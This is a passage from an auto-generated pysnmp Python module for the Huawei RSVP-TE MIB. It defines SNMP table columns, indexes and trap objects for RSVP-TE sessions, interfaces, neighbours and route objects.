hwRsvpTeResvShared = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3, 1, 20), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvShared.setStatus('current')
hwRsvpTeResvExplicit = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3, 1, 21), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvExplicit.setStatus('current')
hwRsvpTeResvRsvpHop = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3, 1, 22), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvRsvpHop.setStatus('current')
hwRsvpTeResvPolicy = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3, 1, 23), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvPolicy.setStatus('current')
hwRsvpTeResvTtl = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3, 1, 24), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvTtl.setStatus('current')
hwRsvpTeResvConfirm = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3, 1, 25), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 16))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvConfirm.setStatus('current')
hwRsvpTeResvFwdTable = MibTable((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4), )
if mibBuilder.loadTexts: hwRsvpTeResvFwdTable.setStatus('current')
hwRsvpTeResvFwdEntry = MibTableRow((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1), ).setIndexNames((0, "HUAWEI-RSVPTE-MIB", "hwRsvpTeSessionNumber"), (0, "HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdNumber"))
if mibBuilder.loadTexts: hwRsvpTeResvFwdEntry.setStatus('current')
hwRsvpTeResvFwdNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 1), Gauge32())
if mibBuilder.loadTexts: hwRsvpTeResvFwdNumber.setStatus('current')
hwRsvpTeResvFwdType = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 2), SessionType()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvFwdType.setStatus('current')
hwRsvpTeResvFwdDestAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 3), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 16))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvFwdDestAddr.setStatus('current')
hwRsvpTeResvFwdSenderAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 4), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 16))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvFwdSenderAddr.setStatus('current')
hwRsvpTeResvFwdDestAddrLength = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 5), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvFwdDestAddrLength.setStatus('current')
hwRsvpTeResvFwdSenderAddrLength = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 6), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvFwdSenderAddrLength.setStatus('current')
hwRsvpTeResvFwdHopAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 7), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 16))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvFwdHopAddr.setStatus('current')
hwRsvpTeResvFwdHopLih = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 8), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvFwdHopLih.setStatus('current')
hwRsvpTeResvFwdInterface = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 9), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvFwdInterface.setStatus('current')
hwRsvpTeResvFwdService = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 10), QosService()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvFwdService.setStatus('current')
hwRsvpTeResvFwdTSpecRate = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 11), BitRate()).setUnits('bits per second').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvFwdTSpecRate.setStatus('current')
hwRsvpTeResvFwdTSpecPeakRate = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 12), BitRate()).setUnits('bits per second').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvFwdTSpecPeakRate.setStatus('current')
hwRsvpTeResvFwdTSpecBurst = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 13), BurstSize()).setUnits('bytes').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvFwdTSpecBurst.setStatus('current')
hwRsvpTeResvFwdTSpecMinTu = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 14), MessageSize()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvFwdTSpecMinTu.setStatus('current')
hwRsvpTeResvFwdTSpecMaxTu = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 15), MessageSize()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvFwdTSpecMaxTu.setStatus('current')
hwRsvpTeResvFwdRSpecRate = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 16), BitRate()).setUnits('bytes per second').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvFwdRSpecRate.setStatus('current')
hwRsvpTeResvFwdRSpecSlack = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 17), Integer32()).setUnits('microseconds').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvFwdRSpecSlack.setStatus('current')
hwRsvpTeResvFwdInterval = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 18), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvFwdInterval.setStatus('current')
hwRsvpTeResvFwdScope = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 19), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvFwdScope.setStatus('current')
hwRsvpTeResvFwdShared = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 20), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvFwdShared.setStatus('current')
hwRsvpTeResvFwdExplicit = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 21), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvFwdExplicit.setStatus('current')
hwRsvpTeResvFwdRsvpHop = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 22), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvFwdRsvpHop.setStatus('current')
hwRsvpTeResvFwdPolicy = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 23), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvFwdPolicy.setStatus('current')
hwRsvpTeResvFwdTtl = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 24), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvFwdTtl.setStatus('current')
hwRsvpTeResvFwdMsgIdFlag = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 25), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvFwdMsgIdFlag.setStatus('current')
hwRsvpTeResvFwdMsgIdEpoch = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 26), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvFwdMsgIdEpoch.setStatus('current')
hwRsvpTeResvFwdMsgIdNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 27), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvFwdMsgIdNumber.setStatus('current')
hwRsvpTeIfTable = MibTable((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 5), )
if mibBuilder.loadTexts: hwRsvpTeIfTable.setStatus('current')
hwRsvpTeIfEntry = MibTableRow((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 5, 1), ).setIndexNames((0, "IF-MIB", "ifIndex"))
if mibBuilder.loadTexts: hwRsvpTeIfEntry.setStatus('current')
hwRsvpTeIfUdpNbrs = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 5, 1, 1), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeIfUdpNbrs.setStatus('current')
hwRsvpTeIfIpNbrs = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 5, 1, 2), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeIfIpNbrs.setStatus('current')
hwRsvpTeIfNbrs = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 5, 1, 3), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeIfNbrs.setStatus('current')
hwRsvpTeIfRefreshBlockadeMultiple = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 5, 1, 4), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeIfRefreshBlockadeMultiple.setStatus('current')
hwRsvpTeIfRefreshMultiple = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 5, 1, 5), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeIfRefreshMultiple.setStatus('current')
hwRsvpTeIfTtl = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 5, 1, 6), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeIfTtl.setStatus('current')
hwRsvpTeIfRefreshInterval = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 5, 1, 7), TimeInterval()).setUnits('milliseconds').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeIfRefreshInterval.setStatus('current')
hwRsvpTeIfRouteDelay = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 5, 1, 8), TimeInterval()).setUnits('hundredths of a second').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeIfRouteDelay.setStatus('current')
hwRsvpTeIfEnabled = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 5, 1, 9), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeIfEnabled.setStatus('current')
hwRsvpTeIfUdpRequired = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 5, 1, 10), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeIfUdpRequired.setStatus('current')
hwRsvpTeIfStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 5, 1, 11), RowStatus()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: hwRsvpTeIfStatus.setStatus('current')
hwRsvpTeIfHelloEnabled = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 5, 1, 12), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeIfHelloEnabled.setStatus('current')
hwRsvpTeIfSrefreshEnabled = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 5, 1, 13), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeIfSrefreshEnabled.setStatus('current')
hwRsvpTeIfSrefreshInterval = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 5, 1, 14), TimeInterval()).setUnits('milliseconds').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeIfSrefreshInterval.setStatus('current')
hwRsvpTeIfRetranIncDelta = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 5, 1, 15), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeIfRetranIncDelta.setStatus('current')
hwRsvpTeIfRetranInterval = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 5, 1, 16), TimeInterval()).setUnits('milliseconds').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeIfRetranInterval.setStatus('current')
hwRsvpTeIfAuthEnabled = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 5, 1, 17), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeIfAuthEnabled.setStatus('current')
hwRsvpTeIfAuthEncrypted = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 5, 1, 18), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeIfAuthEncrypted.setStatus('current')
hwRsvpTeIfAuthHandshake = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 5, 1, 19), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeIfAuthHandshake.setStatus('current')
hwRsvpTeIfAuthLifeTime = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 5, 1, 20), TimeInterval()).setUnits('milliseconds').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeIfAuthLifeTime.setStatus('current')
hwRsvpTeIfAuthKey = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 5, 1, 21), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 392))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeIfAuthKey.setStatus('current')
hwRsvpTeIfWindowSize = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 5, 1, 22), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeIfWindowSize.setStatus('current')
hwRsvpTeNbrTable = MibTable((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 6), )
if mibBuilder.loadTexts: hwRsvpTeNbrTable.setStatus('current')
hwRsvpTeNbrEntry = MibTableRow((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 6, 1), ).setIndexNames((0, "IF-MIB", "ifIndex"), (0, "HUAWEI-RSVPTE-MIB", "hwRsvpTeNbrAddress"))
if mibBuilder.loadTexts: hwRsvpTeNbrEntry.setStatus('current')
hwRsvpTeNbrAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 6, 1, 1), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 16)))
if mibBuilder.loadTexts: hwRsvpTeNbrAddress.setStatus('current')
hwRsvpTeNbrProtocol = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 6, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("ip", 1), ("udp", 2), ("both", 3)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeNbrProtocol.setStatus('current')
hwRsvpTeNbrStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 6, 1, 3), RowStatus()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: hwRsvpTeNbrStatus.setStatus('current')
hwRsvpTeNbrSendersNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 6, 1, 4), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeNbrSendersNumber.setStatus('current')
hwRsvpTeNbrReceiversNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 6, 1, 5), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeNbrReceiversNumber.setStatus('current')
hwRsvpTeNbrHelloEnabled = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 6, 1, 6), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeNbrHelloEnabled.setStatus('current')
hwRsvpTeNbrHelloSrcInstance = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 6, 1, 7), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeNbrHelloSrcInstance.setStatus('current')
hwRsvpTeNbrHelloDstInstance = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 6, 1, 8), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeNbrHelloDstInstance.setStatus('current')
hwRsvpTeNbrHelloLostCounter = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 6, 1, 9), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeNbrHelloLostCounter.setStatus('current')
hwRsvpTeNbrHelloType = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 6, 1, 10), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("request", 1), ("ack", 2), ("none", 3)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeNbrHelloType.setStatus('current')
hwRsvpTeNbrGrCapability = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 6, 1, 11), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeNbrGrCapability.setStatus('current')
hwRsvpTeNbrGrRestartTime = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 6, 1, 12), TimeStamp()).setUnits('milliseconds').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeNbrGrRestartTime.setStatus('current')
hwRsvpTeNbrGrRecoveryTime = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 6, 1, 13), TimeStamp()).setUnits('milliseconds').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeNbrGrRecoveryTime.setStatus('current')
hwRsvpTeNbrGrStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 6, 1, 14), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6))).clone(namedValues=NamedValues(("normal", 1), ("supporting", 2), ("restarting", 3), ("restartTimerRunning", 4), ("recoveryTimerRunning", 5), ("grEnd", 6)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeNbrGrStatus.setStatus('current')
hwRsvpTeNbrAuthKeyId = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 6, 1, 15), OctetString().subtype(subtypeSpec=ConstraintsUnion(ValueSizeConstraint(0, 0), ValueSizeConstraint(6, 6), ))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeNbrAuthKeyId.setStatus('current')
hwRsvpTeNbrReductionEnabled = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 6, 1, 16), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeNbrReductionEnabled.setStatus('current')
hwRsvpTeNbrReliabilityEnabled = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 6, 1, 17), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeNbrReliabilityEnabled.setStatus('current')
hwRsvpTeMessageIdTable = MibTable((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 7), )
if mibBuilder.loadTexts: hwRsvpTeMessageIdTable.setStatus('current')
hwRsvpTeMessageIdEntry = MibTableRow((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 7, 1), ).setIndexNames((0, "IF-MIB", "ifIndex"), (0, "HUAWEI-RSVPTE-MIB", "hwRsvpTeNbrAddress"), (0, "HUAWEI-RSVPTE-MIB", "hwRsvpTeMessageIdEpoch"), (0, "HUAWEI-RSVPTE-MIB", "hwRsvpTeMessageIdNumber"))
if mibBuilder.loadTexts: hwRsvpTeMessageIdEntry.setStatus('current')
hwRsvpTeMessageIdEpoch = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 7, 1, 1), Gauge32())
if mibBuilder.loadTexts: hwRsvpTeMessageIdEpoch.setStatus('current')
hwRsvpTeMessageIdNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 7, 1, 2), Gauge32())
if mibBuilder.loadTexts: hwRsvpTeMessageIdNumber.setStatus('current')
hwRsvpTeMessageIdFlag = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 7, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5))).clone(namedValues=NamedValues(("senderIncoming", 1), ("senderOutgoing", 2), ("resv", 3), ("resvFwd", 4), ("rtBuff", 5)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeMessageIdFlag.setStatus('current')
hwRsvpTeFilterSpecTable = MibTable((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 8), )
if mibBuilder.loadTexts: hwRsvpTeFilterSpecTable.setStatus('current')
hwRsvpTeFilterSpecEntry = MibTableRow((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 8, 1), ).setIndexNames((0, "HUAWEI-RSVPTE-MIB", "hwRsvpTeSessionNumber"), (0, "HUAWEI-RSVPTE-MIB", "hwRsvpTeResvNumber"), (0, "HUAWEI-RSVPTE-MIB", "hwRsvpTeFilterSpecNumber"))
if mibBuilder.loadTexts: hwRsvpTeFilterSpecEntry.setStatus('current')
hwRsvpTeFilterSpecNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 8, 1, 1), Gauge32())
if mibBuilder.loadTexts: hwRsvpTeFilterSpecNumber.setStatus('current')
hwRsvpTeFilterSpecLspId = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 8, 1, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeFilterSpecLspId.setStatus('current')
hwRsvpTeFilterSpecIngressLsrId = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 8, 1, 3), OctetString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeFilterSpecIngressLsrId.setStatus('current')
hwRsvpTeFilterSpecLabel = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 8, 1, 4), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeFilterSpecLabel.setStatus('current')
hwRsvpTeRroTable = MibTable((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 9), )
if mibBuilder.loadTexts: hwRsvpTeRroTable.setStatus('current')
hwRsvpTeRroEntry = MibTableRow((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 9, 1), ).setIndexNames((0, "HUAWEI-RSVPTE-MIB", "hwRsvpTeSessionNumber"), (0, "HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderNumber"), (0, "HUAWEI-RSVPTE-MIB", "hwRsvpTeRroNumber"))
if mibBuilder.loadTexts: hwRsvpTeRroEntry.setStatus('current')
hwRsvpTeRroNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 9, 1, 1), Gauge32())
if mibBuilder.loadTexts: hwRsvpTeRroNumber.setStatus('current')
hwRsvpTeRroType = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 9, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("ipv4", 1), ("ipv6", 2), ("label", 3)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeRroType.setStatus('current')
hwRsvpTeRroIpAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 9, 1, 3), OctetString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeRroIpAddr.setStatus('current')
hwRsvpTeRroIpPrefixLen = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 9, 1, 4), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeRroIpPrefixLen.setStatus('current')
hwRsvpTeRroLabel = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 9, 1, 5), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeRroLabel.setStatus('current')
hwRsvpTeRroFlag = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 9, 1, 6), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeRroFlag.setStatus('current')
hwRsvpTeEroTable = MibTable((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 10), )
if mibBuilder.loadTexts: hwRsvpTeEroTable.setStatus('current')
hwRsvpTeEroEntry = MibTableRow((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 10, 1), ).setIndexNames((0, "HUAWEI-RSVPTE-MIB", "hwRsvpTeSessionNumber"), (0, "HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderNumber"), (0, "HUAWEI-RSVPTE-MIB", "hwRsvpTeEroNumber"))
if mibBuilder.loadTexts: hwRsvpTeEroEntry.setStatus('current')
hwRsvpTeEroNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 10, 1, 1), Gauge32())
if mibBuilder.loadTexts: hwRsvpTeEroNumber.setStatus('current')
hwRsvpTeEroType = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 10, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("ipv4", 1), ("ipv6", 2)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeEroType.setStatus('current')
hwRsvpTeEroIpAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 10, 1, 3), OctetString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeEroIpAddr.setStatus('current')
hwRsvpTeEroIpPrefixLen = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 10, 1, 4), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeEroIpPrefixLen.setStatus('current')
hwRsvpTeExtendObjects = MibIdentifier((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 11))
hwRsvpTeExtendTrap = MibIdentifier((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 12))
hwRsvpTeTrapObjects = MibIdentifier((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 12, 1))
hwRsvpTeNbr = MibScalar((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 12, 1, 1), IpAddress()).setMaxAccess("accessiblefornotify")
if mibBuilder.loadTexts: hwRsvpTeNbr.setStatus('current')
hwRsvpTeIfNbrCurrentCount = MibScalar((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 12, 1, 2), Integer32()).setMaxAccess("accessiblefornotify")
if mibBuilder.loadTexts: hwRsvpTeIfNbrCurrentCount.setStatus('current')
hwRsvpTeIfNbrThreshold = MibScalar((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 12, 1, 3), Integer32()).setMaxAccess("accessiblefornotify")
if mibBuilder.loadTexts: hwRsvpTeIfNbrThreshold.setStatus('current')
hwRsvpTeIfNbrTotalCount = MibScalar((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 12, 1, 4), Integer32()).setMaxAccess("accessiblefornotify")
if mibBuilder.loadTexts: hwRsvpTeIfNbrTotalCount.setStatus('current')
